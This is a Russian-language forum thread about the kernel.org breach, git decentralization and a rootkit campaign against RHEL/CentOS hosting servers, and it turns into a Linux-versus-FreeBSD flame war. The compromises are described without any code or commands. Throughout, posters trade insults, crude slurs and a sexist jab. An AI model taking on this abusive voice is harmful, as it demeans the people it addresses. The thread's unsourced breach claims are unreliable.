> 2) Вообще-то гит на то и DVCS что у каждого на руках
> при желании есть именно полная копия со всеми наворотами. Со всеми
> коммитами, тэгами, бранчами и чем там еще. Если этого хотелось -
> оно таки у вас будет.а прилетает оно мне из космоса или откуда?
> вопрос не про нас, а про разработчиков. некий разработчик не в курсе, что он сломан.Ах, оказывается кернелорг ломать уже не требуется? Требуется ломать конкретных разработчиков?
Но да, я таки думаю что если разработчик ядра да вдруг не заметит что его взломали - хана его репутации. Как же он кернел разрабатывает, если не контролирует что у него на машине творится даже? А как он тогда кернел отлаживает и проблемы ловит?
>> коммитами, тэгами, бранчами и чем там еще. Если этого хотелось - оно таки у вас будет.
> а прилетает оно мне из космоса или откуда?Оно не "прилетает". Разработчик явно говорит: "хочу тебе вкатить фичу X". Ну и тот кто ее будет мержить - забирает соотв. группу коммитов. Это называется pull request. Он инициируется разработчиком фичи по мере готовности кода, если момент времени правильный.
Но как сказал arisu, "мyдaки cannot into dvcs". Походу реально cannot.
> Оно не "прилетает". Разработчик явно говорит: "хочу тебе вкатить фичу X". Ну
> и тот кто ее будет мержить - забирает соотв. группу коммитов.
> Это называется pull request. Он инициируется разработчиком фичи по мере готовности
> кода, если момент времени правильный.Кстати, о киллер-фичах. В svn можно хоть тушкой, хоть чучелом, сделать аналог pull request?
> Кстати, о киллер-фичах. В svn можно хоть тушкой, хоть чучелом, сделать аналог pull request?Так сходу затрудняюсь себе вообразить такой стиль работы через svn. Ну не заточен он на такое. Можно ли так изогнуться с помощью костылей - у тигара и прочих спроси, пусть поблещут сообразительностью в очередной раз :).
>>> коммитами, тэгами, бранчами и чем там еще. Если этого хотелось - оно таки у вас будет.
>> а прилетает оно мне из космоса или откуда?
> Оно не "прилетает". Разработчик явно говорит: "хочу тебе вкатить фичу X". Ну
> и тот кто ее будет мержить - забирает соотв. группу коммитов.
> Это называется pull request. Он инициируется разработчиком фичи по мере готовности
> кода, если момент времени правильный.вот значит оказывается есть центральная точка - которая у всех забирает.
Теперь вам осталось признать что все эти разработчики используют эту точку как эталон.
И не надо прикрываться что можно сделать тоже самое самому.
А значит по факту есть центральная точка - то что вы и признать не хотите.
> вот значит оказывается есть центральная точка - которая у всех забирает.
> Теперь вам осталось признать что все эти разработчики используют эту точку как
> эталон.
> И не надо прикрываться что можно сделать тоже самое самому.
> А значит по факту есть центральная точка - то что вы и
> признать не хотите.Наташа, если ничего не помогает, прочти же, наконец, инструкцию.
- Уничтожается центральный репозиторий, скажем svn. Все остаются без репозитория, без истории, без всего.
- Уничтожается 'центральный' репозиторий в git. Практически ничего не изменилось, можно взять любой другой и сказать - теперь ты 'центральный'. Или вот он.
- Уничтожается linuxmustrip. Все радуются, поют песни и даже ощущают, что воздух стал чище и консистенция ума прибавилась.Разумеется, 'центральный' репозиторий есть. Чтобы юзерам было, куда ходить. И потому что правом выпуска обладает только Торвальдс. Какой-то код могут не принять, и правильно сделают, но суть не в этом. Суть в проверке подлинности, что-то тайно подсунуть задним числом не может не Торвальдс, ни даже ты, Наташенька, со всей своей логикой девочки-подростка в момент созревания (задаём один вопрос, а требуем ответа на другой).
>> вот значит оказывается есть центральная точка - которая у всех забирает.
>> Теперь вам осталось признать что все эти разработчики используют эту точку как
>> эталон.
>> И не надо прикрываться что можно сделать тоже самое самому.
>> А значит по факту есть центральная точка - то что вы и
>> признать не хотите.
> Наташа, если ничего не помогает, прочти же, наконец, инструкцию.
> - Уничтожается центральный репозиторий, скажем svn. Все остаются без репозитория, без истории,
> без всего.откройте уж для себя варианты с зеркалированием локально репы. А для cvs были даже пожелания в FreeBSD handbook как реализовать такую работу через cvsup.
Ровно так же уничтожение "центрального" сервера - не приносит никаких проблем.И если вам не известны подобные механизмы - то не значит что их нет, это лишь говорит о вашей слабой подготовке и юном возрасте.
> - Уничтожается 'центральный' репозиторий в git. Практически ничего не изменилось, можно
> взять любой другой и сказать - теперь ты 'центральный'. Или вот
> он.Вносится изменения в этот репозиторий - и они оказываются разом у всех..
То есть вот он центральный то..
А когда накрыли kernel.org - почему-то пришлось заново делать новый центральный..
Хотя git весь такой децентрализованый
Ну хорошо что вы наконец признали что есть центральная точка. Куда можно внести втихую изменения и эти изменения попадут всем юзерам.. Осталось еще быть самокритичнее к себе.
На счет поиска следов взлома - вы уже облажались, теперь облажались тут и пытаетесь перевести стрелки..Буратина он был такой деревянный..
PS. hint, git не всегда делает копию всего всего - так что при удалении центральной репы с gerrit - ты лишаешся всего что в процессе review. если не принимать спец телодвижения.
Почти таже ситуация что с svn/cvs.
> откройте уж для себя варианты с зеркалированием локально репы.Которая ничего не даст в указанном случае. Вместо одного поддельного зеркала будут два, или три.
_*/[big][font=7][ахуетьневстать][разоблачениевека]ПОТОМУ ЧТО В SVN ЛОКАЛЬНАЯ КОПИЯ ЭТО ФАЙЛЫ А В GIT ЭТО СЕРИЯ ПАТЧЕЙ
> вот значит оказывается есть центральная точка - которая у всех забирает.
> Теперь вам осталось признать что все эти разработчики используют эту точку как
> эталон.
> И не надо прикрываться что можно сделать тоже самое самому.
> А значит по факту есть центральная точка - то что вы и
> признать не хотите.Кстати, суслик, подскажи, если знаешь:
Вот у меня есть один компьютер, куда постоянно по cron с git/hg синхронизируются интересующие меня проекты, прямо в мой rhodecode - я там смотрю дифы, наборы изменений и делаю многое другое, что позволяет делать эта Чтука.
На втором компьютере у меня есть зеркало всех нужных мне транков, куда я скриптом собираю все транки. Так вот, там есть и те, которые я забираю с первого компьютера, чтобы они были все под рукой.
Внимание, вопрос: какой из репозиториев для этих транков - центральный?
> Не больно какая разница, один хрен хост под реинсталл, т.к. мало ли
> кто, чего и где не заметил. Зато у пингвиноидов самое ценное
> что там было, т.е. сорец линя защищен DVCSом от левых вбросов
> коммитов задним числом в силу принципов его работы.http://paperdogvideo.com/wp-content/uploads/2012/07/Spoon400...
> Счет пошел на десятки, если не сотни.Когда червь-троян-иликтотам крал с windows машин пароли на разные ftp и прочие путти, и по ним охмурял linux-машины, пострадавших было больше.
> с немного другой стороны - сказали что недавно проломили php - и
> через него залили архивчик с несколькими эксплойтами под ядро + на
> всякий случай - под гипервизоры, но так как там был не
> linux, то народ обломался.http://juick.com/blacklion/2240395
Народ должен знать своих героев. :-)
> http://juick.com/blacklion/2240395
> Народ должен знать своих героев. :-)Хорош герой - 6 троянов на сервант собрал. И что-то наличие фри не помешало их на сервак собрать.
А почему не герой? Именно что герой: подставил свои сервера (это, впрочем, скорее всего ненамеренно), дал время троянам поработать (тоже ненамеренно), выявил их возможности (возможно не все) и сдал всё это доктору. Спасибо ему сказать надо. Обратите внимание, что заметил трояны он скорее всего благодаря тому, что использует FreeBSD.
ФриБЗДя - рышыто
> ФриБЗДя - рышыто
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632дыа!1
> дыа!1Лол, потом не отмазывайся что ты этого не говорил :)
>> дыа!1
> Лол, потом не отмазывайся что ты этого не говорил :)дак а чо отмазываться-то? вот оно, доступно всем: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:02....
власти не скрывают.
> власти не скрывают.Конкретно зацитированное какое-то не очень страшное даже. Ну то-есть, теоретически хаксор может что-то завалить. Практически - скорее всего найдется масса не менее эффективных способов.
>> власти не скрывают.
> Конкретно зацитированное какое-то не очень страшное даже. Ну то-есть, теоретически хаксор
> может что-то завалить. Практически - скорее всего найдется масса не менее
> эффективных способов.надо же! в тебе зарождается интеллект. внезапно как-то
> ФриБЗДя - рышыто
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632Зато нет такого: "Ой, десятки, если сотни серверов под линь сломаны и мы не знаем как".
> А почему не герой? Именно что герой: подставил свои сервера (это, впрочем,
> скорее всего ненамеренно), дал время троянам поработать (тоже ненамеренно), выявил их
> возможности (возможно не все) и сдал всё это доктору. Спасибо ему
> сказать надо. Обратите внимание, что заметил трояны он скорее всего благодаря
> тому, что использует FreeBSD.лет 6 назад наблюдал за активностью 1 смешной зверюшки, через дырку в 1 пхп-щной хреньки залезла и пыталась wget`ом чего-то качать. тогда я ржал громко. а щас попытки луноходов запустить на фре wget, bash и mc уже даже улыбку не вызывают.
> и mc уже даже улыбку не вызывают.Да, фрибзда настолько фэйловая ос что там даже вирье фэйлит :).
>> и mc уже даже улыбку не вызывают.
> Да, фрибзда настолько фэйловая ос что там даже вирье фэйлит :).скорее писатели зверьков сильно тупые.
вот, как пример, http://pastebin.com/4hZC5zLy (12 августа 2011 год). судя по всему, с тех пор они не поумнели, скорее в их полку прибыло, спасибо космонавту с его халявными подставками для кружек.
> вот, как пример, http://pastebin.com/4hZC5zLy (12 августа 2011 год).Что это за жаба-хрень? Я уже по изену убедился какие жабисты "умные". Кстати он из ваших, бсдшников. Что не мешает ему быть абсолютной деревяхой, не отличающей сисколы от компилеров :)
>> вот, как пример, http://pastebin.com/4hZC5zLy (12 августа 2011 год).
> Что это за жаба-хрень? Я уже по изену убедился какие жабисты "умные".
> Кстати он из ваших, бсдшников. Что не мешает ему быть абсолютной
> деревяхой, не отличающей сисколы от компилеров :)ну эм.. если присмотреться внимательно, можно легко заметить, что я раз 100 изе говорил, чтобы он шел в убунтоводы и их опускал еще больше своими репликами.
но тебе-то, не деревяхе, должно быть абсолютно похрен на чем тот чудо код. я вот жаву не знаю и мне, например, очевидно, что тот код делает.
> ну эм.. если присмотреться внимательно, можно легко заметить, что я раз 100
> изе говорил, чтобы он шел в убунтоводы и их опускал еще больше своими репликами.Да ладно, по-моему, такие как ты, изен и прочие нагуалы вполне неплохо показывают кто и почему бзди нынче юзает. А те кому было ехать а не шашечки и понты - давно слиняли на пингвин. А понтоваться операционкой - удел тех кому больше понтануться ну вобще совсем нечем.
> но тебе-то, не деревяхе, должно быть абсолютно похрен на чем тот чудо код.
Э нет. Как раз некий опыт подсказывает мне что выбор ЯП довольно много говорит об авторе. И если это java - это или энтерпрайзные быдлокодеры, или какие-то скрипткидисы типа изена. В данном случае наиболее вероятно именно второе.
> я вот жаву не знаю и мне, например, очевидно, что тот код делает.
Да не, дело то не в том. Разобраться в этом коде и я могу, хоть и не знаю жавы. Но вот ожидать слишком многого от того кто такое пишет на жаве - это как правило большая ошибка. Что можно ожидать от типичного програмера на яве - прекрасно видно на примере изена.
>> ну эм.. если присмотреться внимательно, можно легко заметить, что я раз 100
>> изе говорил, чтобы он шел в убунтоводы и их опускал еще больше своими репликами.
> Да ладно, по-моему, такие как ты, изен и прочие нагуалы вполне неплохо
> показывают кто и почему бзди нынче юзает. А те кому былосказал усёр294 который уже даже и логиниться под собой очкует?;) знаешь, тебя и под ананимом узнать можно, так что обосрать ананимов ты конечно можешь, подписавшись им, но только в глазах тех, кто тебя, недалекого, не умеет детектить;)
> ехать а не шашечки и понты - давно слиняли на пингвин.
> А понтоваться операционкой - удел тех кому больше понтануться ну вобще
> совсем нечем.сказал Счастливый Обладатель никЫя n900 (?). ты его еще не спустил в унитаз от горя-то?;)
> Э нет. Как раз некий опыт подсказывает мне что выбор ЯП довольно
> много говорит об авторе. И если это java - это или
> энтерпрайзные быдлокодеры, или какие-то скрипткидисы типа изена. В данном случае наиболее
> вероятно именно второе.детонька, а сколько "энторпрайзных быдлокодеров" ты знаешь лично? у вас там среди коллег-токарей и такие есть? что-то сомневаюсь.
>> я вот жаву не знаю и мне, например, очевидно, что тот код делает.
> Да не, дело то не в том. Разобраться в этом коде и
> я могу, хоть и не знаю жавы. Но вот ожидать слишком
> многого от того кто такое пишет на жаве - это как
> правило большая ошибка. Что можно ожидать от типичного програмера на яве
> - прекрасно видно на примере изена.и только Специалист294 знающий ааааще всьо не смог догадаться, откуда я тот говнокод выцепил. попробуй поспрошать знакомых "энторпрайзных быдлокодеров" каким образом оно могло у меня оказаться, и, главное, почему жава. (хинт: нет, это не я писал тот чудо код).
> не умеет детектить;)Да детекти наздоровье. Могу же я покушать немного, раз тут хорошо кормят, а? :)
> сказал Счастливый Обладатель никЫя n900 (?). ты его еще не спустил в yнитаз от горя-то?;)
Это прекрасная машинка, которая сильно упрощает мне жизнь. Обеспечивая шифрованный впн, так что можно без стрема использовать открытый вайфай где попало, навигацию на краю земли, возможность сервером порулить в чистом поле, автоматизировать какие либо действия, ... . Ну и вообще - хорошо когда в кармане настоящий маленький компьютер с пингвином, что ни говори. Но да, в одном ты прав: я счастлив что у меня есть этот девайс.
> детонька, а сколько "энторпрайзных быдлoкодеров" ты знаешь лично?
Вот что-что а на это "счастье" я насмотрелся. Вплоть до индивидов которые сами base64 декодер написать не могут. Знаю несколько десятков, наверное. А что?
> у вас там среди коллег-токарей и такие есть? что-то сомневаюсь.
Вот к сожалению токарей знакомых у меня нет :(. О чем несколько раз приходилось сожалеть.
> и только Специалист294 знающий ааааще всьо не смог догадаться,
Если честно, я даже и не пытался. Ява-крап настолько меня не интересует, что у меня его нет и не будет. Это так сложно понять?
> откуда я тот гoвнокод выцепил. попробуй поспрошать знакомых
> "энторпрайзных быдлокодеров" каким образом оно могло у меня оказаться, и,
> главное, почему жава. (хинт: нет, это не я писал тот чудо код).Слушай, как тебе еще популярнее объяснить что мне неинтересен ява-крап? И с быдлокодерами на яве я не испытываю желания общаться лишний раз. Не люблю туповатых персонажей. Правда просто? :)
> И с быдлокодерами на яве я не испытываю желания общаться лишний раз. Не
> люблю туповатых персонажей. Правда просто? :)ну как бы это сказать.. даже те ява-говнокодеры которые мне встречались, поумнее тебя будут, по наблюдениям. но ты "кушай" ага. всегда ж выгоднее прикрыть якобы троллингом свою тупость;)
> прикрыть якобы троллингом свою тупость;)Ишь какой забавный батхерт :). Ты как школьник на уроке не сделавший домашку. Слушай, а ты никогда не думал что мне попросту положить на твое мнение о моей персоне? Ты не такой уж и пуп земли, чтобы я надрывался тебе что-то доказывать, если ты вдруг этого еще не понял :)
... как и попытку использовать бзде для десктопных задач, да?
> ... как и попытку использовать бзде для десктопных задач, да?а можно узнать, что такое "десктопных задач" ?
> лет 6 назад наблюдал за активностью 1 смешной зверюшки, через дырку в
> 1 пхп-щной хреньки залезла и пыталась wget`ом чего-то качать. тогда я
> ржал громко. а щас попытки луноходов запустить на фре wget, bash
> и mc уже даже улыбку не вызывают.В арче в базовой системе и вообще, без доставки по требованию, нет wget. Это раз.
У меня на фре был и wget, и bash, и mc. Это два.
И третье, самое главное: люди, которые считают, что linux * это плохая свободная ОС, и постоянно ищут её недостатки, а freebsd это хорошая свободная ос и постоянно ищут её достоинства - сотворили себе кумира. тельца для поклонения. со всеми соответствующими. Это такие же больные люди, как и те, которые считают, что "Спартак" это хорошо, а "Динамо" это плохо.
Я категорически против linux-центризма, но freebsd-центризм имеет гораздо меньше права на жизнь.
Когда кто-то найдёт способ всех вот таких снобов-центристов с помощью какого-нибудь психологического трюка с гневом покинуть сообщество - будет самым замечательным в истории этого самого сообщества. Когда вместо ежедневных раздоров там будет ежедневное взаимодействие, когда сообщество будет защищено от внешних и внутренних врагов - тогда оно будет работать в полную силу, с запредельным КПД. А пока кто-то ставит freebsd для того, чтобы самоутверждаться за счёт других - я не думаю, что это свободный человек. Это враг другим людям, он только и делает, что мешает.
> У меня на фре был и wget, и bash, и mc. Это
> два.ну значит в твоем случае у тупого скрипта получилось бы шелл влить (я про wget), он, собственно, и не нужен по большому счету, на фре, но его ставят такие вот товарищи :)
> И третье, самое главное: люди, которые считают, что linux * это плохая
> свободная ОС, и постоянно ищут её недостатки, а freebsd это хорошая
> свободная ос и постоянно ищут её достоинства - сотворили себе кумира.
> тельца для поклонения. со всеми соответствующими. Это такие же больные люди,
> как и те, которые считают, что "Спартак" это хорошо, а "Динамо"
> это плохо.тебя снова накрыло?
чтобы сразу расставить все на свои места:
1) футбол - говно и бесполезная трата времени, наблюдать как куча имбицилов гоняется за мячиком. и не важно, спартак там или динамо.
2) недостатки в линуксе (как и во фре) ищут только больные на голову, остальным и так видно, что они есть.
> Я категорически против linux-центризма, но freebsd-центризм имеет гораздо меньше права
> на жизнь.гыгы. а из чего следует, что "имеет гораздо меньше права на жизнь"?;-) IMO они одинаково не имеют. да, я ставить фрю стараюсь везде, чтобы проще было обслуживать, но это не означает, что у меня есть только она.
> Когда кто-то найдёт способ всех вот таких снобов-центристов с помощью какого-нибудь психологического
> трюка с гневом покинуть сообщество - будет самым замечательным в истории
> этого самого сообщества. Когда вместо ежедневных раздоров там будет ежедневное взаимодействие,
> когда сообщество будет защищено от внешних и внутренних врагов - тогда
> оно будет работать в полную силу, с запредельным КПД. А покаа пока есть 100500 дистрибутивов линукса их 17-21 летние "поклонники" будут поливать говном друг-дружку. (странно, еще никто из них не успел отметиться типа "Сервер на арче?! лол"). не будет bsd систем - срачики-то не прекратятся. пора бы тебе это понять, не маленький ж уже, поди.
> кто-то ставит freebsd для того, чтобы самоутверждаться за счёт других -
> я не думаю, что это свободный человек. Это враг другим людям,
> он только и делает, что мешает.т.е. ты намекаешь на то, что поставивший fbsd круче "других"?:-)
а попробуй в своей фразе сделать s/freebsd/ubuntu/ и под "других" иметь ввиду пользователей виндовс, например. что изменилось?;-)
> т.е. ты намекаешь на то, что поставивший fbsd круче "других"?:-)
> а попробуй в своей фразе сделать s/freebsd/ubuntu/ и под "других" иметь ввиду
> пользователей виндовс, например. что изменилось?;-)Пользователей windows на опеннете вообще быть не должно, потому что им это всё не особо интересно. Да и нельзя одновременно дуть в дудочку windows и собирать в кувшинчик floss.
А то, что конкретные личности ведут себя по описанному - это не из-за осей. Осями они только прикрываются.
>> т.е. ты намекаешь на то, что поставивший fbsd круче "других"?:-)
>> а попробуй в своей фразе сделать s/freebsd/ubuntu/ и под "других" иметь ввиду
>> пользователей виндовс, например. что изменилось?;-)
> Пользователей windows на опеннете вообще быть не должно, потому что им это
> всё не особо интересно. Да и нельзя одновременно дуть в дудочку
> windows и собирать в кувшинчик floss.предложи по user-agent их не пускать, хотябы:) ну и да, много таких, которые putty.exe. я правда не знаю ниодного, не тупого чтобы.
> А то, что конкретные личности ведут себя по описанному - это не
> из-за осей. Осями они только прикрываются.какой жестокий мир нас окружает!
> какой жестокий мир нас окружает!Не жестокий мир, а слабохарактерные люди. Которых этот жестокий мир обидел, и которые готовы по этому поводу выместить зло на первом встречном. Они думают, что это признак крутости, а это признак слабости.
Даже буратина дело говорит. Вон тут этот, который RIP - характерный персонаж. Ну да, его жизнь поимела, с ораколм на пару, загнобив любимую соляру. Но виноват в этом конечно же линукс, ога.
> Даже буратина дело говорит.И слово делает. И вообще, поздно пить Боржоми, когда есть Буратино.
Не, то что сдал - малацца, сознательный тип. А вот то что у него на серверах водится зоопарк живности - таки говорит о нем как об админе с наихучшей стороны. Все-таки хороший админ должен не допускать поимения, а не технично подтирать зад после того как обделался.
> http://juick.com/blacklion/2240395
> Народ должен знать своих героев. :-)по ссылке - ни скриптов, ни исходников троянцев. ничего.
такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе какое-то внимание.
> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе
> какое-то внимание.Теперь мы знаем что он лох и у него 6 троянов на серваке было. Как репортеру аверам - зачет. Как админу - факофф, гнать таких админов. С волчьим билетом. Пусть идет к аверам работать, заразу разыскивать. Может быть это у него лучше чем администрежка будет получаться.
>> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе
>> какое-то внимание.
> Теперь мы знаем что он лох и у него 6 троянов на
> серваке было. Как репортеру аверам - зачет. Как админу - факофф,
> гнать таких админов. С волчьим билетом. Пусть идет к аверам работать,
> заразу разыскивать. Может быть это у него лучше чем администрежка будет
> получаться.и только одмин локалхоста ЗоЩиЩоН надежноТМ. и, главное, с администрежкой у него все ок;-)
небольшая подсказка: есть хосты, которые торчат в интернеты, на хостах крутится некое ПО, в котором время от времени находят дырки, иногда афтары ПО о них узнают сильно позже, нежели их начинают юзать плохие дяди.
а в билет себе отметку всеже сделай, да. а то мало ли, еще возьмут куда админить чего.
> и только одмин локалхоста ЗоЩиЩоН надежноТМ. и, главное, с администрежкой у него все ок;-)Ну как бы на месте админа довольно странно гордиться тем что у него на сервере зоопарк малвари крутится. С моей колокольни, компетенция такого админа оставляет желать, да. Что-то типа виндузятника который пачками вирусы из системы вытаскивает и радуется тому что на его древнем win98 половина вирусов уже не работает, т.к. видите ли ожидает более современную ОС.
> небольшая подсказка: есть хосты, которые торчат в интернеты, на хостах крутится некое
> ПО, в котором время от времени находят дырки, иногда афтары ПО
> о них узнают сильно позже, нежели их начинают юзать плохие дяди.А хороший админ
1) Оперативно ставит патчи.
2) Мониторит что происходит на его серверах. При том не когда там уже 6 троянов.
3) Старается не пользоваться софтом с кучей дыр где не оперативно втыкают патчи.
4) Принимает меры к защите от поимения даже есди остальное не помогло. Как то настраивает фаеры, контейнеры/виртуалки, затягивает права и прочая.
> а в билет себе отметку всеже сделай, да.В какой еще билет? Как максимум у меня есть билет на поезд. Но зачем там отметки об админах? :)
>> и только одмин локалхоста ЗоЩиЩоН надежноТМ. и, главное, с администрежкой у него все ок;-)
> Ну как бы на месте админа довольно странно гордиться тем что у
> него на сервере зоопарк малвари крутится. С моей колокольни, компетенция такого_пытается_ крутиться. а про твою колокольню пиши еще, улыбает.
> админа оставляет желать, да. Что-то типа виндузятника который пачками вирусы из
> системы вытаскивает и радуется тому что на его древнем win98 половина
> вирусов уже не работает, т.к. видите ли ожидает более современную ОС.отсутствие wget (например) в системе = менее современная ОС. ок, попробую запомнить.
> А хороший админ0) админит что-то кроме localhost и понял то, о чем я написал выше. проходи мимо.
> В какой еще билет? Как максимум у меня есть билет на поезд.
> Но зачем там отметки об админах? :)юмор тоже какой-то специфический у тебя.
> _пытается_ крутиться.Ну, как бы, security breach засчитан. А то что одна кривизна не заработала на другой кривизне т.к. кривульки радиусами кривизны не сошлись - так это так, сугубо везение, а не чья-то заслуга. Ж@порукость вообще заслугой быть не может по определению.
> а про твою колокольню пиши еще, улыбает.
Ну я думаю что в данном случае очень многие согласятся в оценке качества работы такого админа. Если он такими пачками малвару выколупывает с своих серверов - хороший админ, чо :).
>> вирусов уже не работает, т.к. видите ли ожидает более современную ОС.
> отсутствие wget (например) в системе = менее современная ОС. ок, попробую запомнить.Не, в данном случае это таки быдлокодинг чистой воды. Потому что он и в линуксе как-то никому в общем то не обязан присутствовать в обязательном порядке. А приколись, я видел линуксы где его нет. Да, быдлокодерские сплойты - хорошее дополнение к быдлоадмину с 6 троянами на серванте. Дурак дурака - видит издалека. Почему вот у меня нет никаких либкейутилсов? И вообще, никакой левой активности. Прямо скучно даже - даже у крютых бздоидов по 6 троянов за раз, а у меня на дырявом линуксе, да еще убунтовых к тому же - тишь да гладь. Вот что я делаю не так? :)
> 0) админит что-то кроме localhost и понял то, о чем я написал выше. проходи мимо.Ну вот я админю что-то кроме локалхоста. Но что-то не вижу левой активности. Ни работающих троянов, ни пытающихся работать. Даже скучно, блин. Тут такой цирк, кирпичи валятся (правда больше всех их генерят не линуксоиды, как обычно), кого-то хакают. Но почему-то мне ничего не досталось :(.
>> http://juick.com/blacklion/2240395
>> Народ должен знать своих героев. :-)
> по ссылке - ни скриптов, ни исходников троянцев. ничего.
> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе какое-то
> внимание.йунаша, ну попробуй уже научиться пользоваться поисковыми системами не только для поиска прона да "настроить someshit на ubuntu".
чем еще "админушка" помимо lev@freebsd.org отличился пускай будет тебе дом. заданием.
>>> http://juick.com/blacklion/2240395
>>> Народ должен знать своих героев. :-)
>> по ссылке - ни скриптов, ни исходников троянцев. ничего.
>> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе какое-то
>> внимание.
> йунаша, ну попробуй уже научиться пользоваться поисковыми системами не только для поиска
> прона да "настроить someshit на ubuntu".
> чем еще "админушка" помимо lev@freebsd.org отличился пускай будет тебе дом. заданием.собственно история о троянах была получена чуть чуть другим путем - и только тут увидел ссылку на блог.
мир адекватных людей похоже очень тесен :-)
> собственно история о троянах была получена чуть чуть другим путем - и
> только тут увидел ссылку на блог.
> мир адекватных людей похоже очень тесен :-)собственно, ты бы мог и ограничиться тем_самым_каналом в ирц. а так, смотри сколько сотен набрал комментов :)
со всеми ОС такое бывает, я так думаю.
но, тем не менее, повод призадуматься имеется
Проприетарщики как обычно, не смогли под несколько платформ собрать. Нет бы открыть исходники...
И как-то само-собой вспоминается обсуждаемый пару лет назад на Хабре маунал от Пентагоновоцев как правильно настраивать и админить дистр на основе RH. Еще тогда стебались что это руководство с сомнительными настройками - и вот, под прицелом именно RH, в то время как он вроде корпоративненьий. А про Debian веточки то как раз неслышно.
> И как-то само-собой вспоминается обсуждаемый пару лет назад на Хабре маунал от
> Пентагоновоцев как правильно настраивать и админить дистр на основе RH. Еще
> тогда стебались что это руководство с сомнительными настройками - и вот,
> под прицелом именно RH, в то время как он вроде корпоративненьий.
> А про Debian веточки то как раз неслышно.похоже эпидемия не ограничивается RH.
http://www.webhostingtalk.com/showpost.php?p=8565861&postcou...
Looks like it's not only centos specific...
Debian Squeeze w/ Xen 4.0
> похоже эпидемия не ограничивается RH.Похоже, эпидемия как раз ограничивается этим вебхостингтолк...
Есть какая-то ощутимая информация?
если я скажу - что лично видел взломы клиентов - этого хватит ?
если это подтвердят люди из бывшего ASPLinux / BlackCat linux (в частности основатели) - достаточно ?Остальное - верить или нет - ваше право.
просто webhosting talks - весьма известная площадка для общения хостеров.
> если я скажу - что лично видел взломы клиентов - этого хватит?Для чистосердечного признания - думаю, да.
>> если я скажу - что лично видел взломы клиентов - этого хватит?
> Для чистосердечного признания - думаю, да.а для подтверждения правдивости информации ?:)
тут тоже врут.. один ты весь в белом и правдивый :)
http://www.linuxquestions.org/questions/blog/unspawn-2450/si.../
Не позорился бы уж буратинка.. такой же деревянный.
http://forum.directadmin.com/showthread.php?t=45745
http://blog.configserver.com/index.php?itemid=716
и тп..
форумы plesk, cpannel и тп.
>> Вам так столман сказал ?
> Ну назовите хоть одну причину, почему стоит верить вашим соплям?Моим не стоит - но стоит глянуть на официальные сайты Plesk, cPannel, DirectAdmin, CloudLinux, ....
и посмотреть на уведомления там.А верить или не верить - это уже ваше дело :-)
> тут тоже врут.. один ты весь в белом и правдивый :)Ну вы то с вашим ником - просто образец непредвзятости и все такое.
http://stackoverflow.com/questions/14164552/keyctl-commands-...так что не только RHEL 6 clones.
centos 5.8 also.
а бедному буратине - нужно быть не столь деревянным - а научиться пользоваться любимым поисковиком, что видимо ему западло - ибо настоящие пацаны так не делают. Они по ссылкам не ходят, и верят только своим кумирам типа Столмана - если он сказал что дети не нужны, значит детей на дно озера с камушком - что бы не всплыли.
>> и верят только своим кумирам типа Столмана
> Оснований верить Столлману примерно в 15 млн. раз больше, чем верить ссылкам.
> Но если для кого-то святое "нашёл по ссылке" является истиной, то
> ему уже никакой Столлман не поможет.
> Но как тогда назвать тех, которые приходят дрочить на тех, кто слушает
> Столлмана. Латентные столлманофилы? Люди со смещённой сексуальной ориентацией?святое - это стопка тикетов в службе поддержки. Но этого я показать не могу :-)И официальные сообщения на сайтах панелей тоже видимо не правда.
А вы дальше можете верить чему вам хочется. Это так смешно :-)
> святое - это стопка тикетов в службе поддержки.А буратино-то был ближе к истине, чем втикетызрящий:
---
Вот ветка форума, где обсуждался этот руткит:http://www.webhostingtalk.com/showthread.php?t=1235797&page=84
Как раз на этой странице появились сообщения, что компания cPanel
признала факт взлома их серверов, использовавшихся отделом техподдержки,
а в базах там лежало множество паролей, предоставленных клиентами cPanel
для доступа техподдержки к их серверам; так что для последующего
внедрения руткитов на эти сервера не потребовалось искать там
уязвимости. Кроме того, в некоторых случаях обнаруживали вредоносное
ПО, похищающее пароли, на компьютерах с Windows, использовавшихся для
администрирования серверов, где впоследствии был обнаружен руткит.
--- http://lists.altlinux.org/pipermail/smoke-room/2013-March/06...
> А буратино-то был ближе к истине, чем втикетызрящий:и я :) http://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi?quote...
>> А буратино-то был ближе к истине, чем втикетызрящий:
> и я :) http://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi?quote...Да, мне кажется, все более-менее вменяемые сразу показали пальцем на быдлопанели и Windows...
> а бедному буратинеКовбои, остыньте.
>> а бедному буратине
> Ковбои, остыньте.Вы думаете, я несправедлив к этому бедному рыцарю? А мне кажется, что подобных трудных товарищей нужно занимать каким-то полезным делом. :) Или просто удалять. Потому что они шпарят без разбору, по трафарету, своим спамом мешая разглядеть что-либо интересное и полезное. И смущают детей и женщин.
Очень надоело уже погружаться на это дно.
ps. nz.51t.ru/Иуд.1:23 nz.51t.ru/1Тим.1:18-20
>>> а бедному буратине
>> Ковбои, остыньте.
> Вы думаете, я несправедлив к этому бедному рыцарю? А мне кажется, что
> подобных трудных товарищей нужно занимать каким-то полезным делом. :)В данном случае несправедливы -- лучше знать о недостатках, чем о достоинствах. Тем более о критичных проблемах. И вовремя.
Вспомните первую ремотную дырку в OpenBSD и подумайте, как это касалось админов практически всех *NIX-like и насколько важно было получить по возможности точную, полную и актуальную информацию вместо вёдер словесных помоев в разных направлениях.
> В данном случае несправедливы -- лучше знать о недостатках, чем о достоинствах.
> Тем более о критичных проблемах. И вовремя.Лучше. Но подобной информации нет, все следы какие-то фантомные. Если есть уязвимость - то её встретят и устранят. Если это очередной windows-троян, то тоже в итоге можно будет его поймать. За время ожидания так ничего значимого и не произошло.
Но речь то не об этом. Человек скачет с одного на другое, упивается чужими проблемами, и несёт галиматью с умным видом, неоднократно. Когда то, что я не просил, мне пишут 500 раз, это называется спам. И, если его не фильтровать, в нём можно утонуть.
> Вспомните первую ремотную дырку в OpenBSD и подумайте, как это касалось админов
> практически всех *NIX-like и насколько важно было получить по возможности точную,
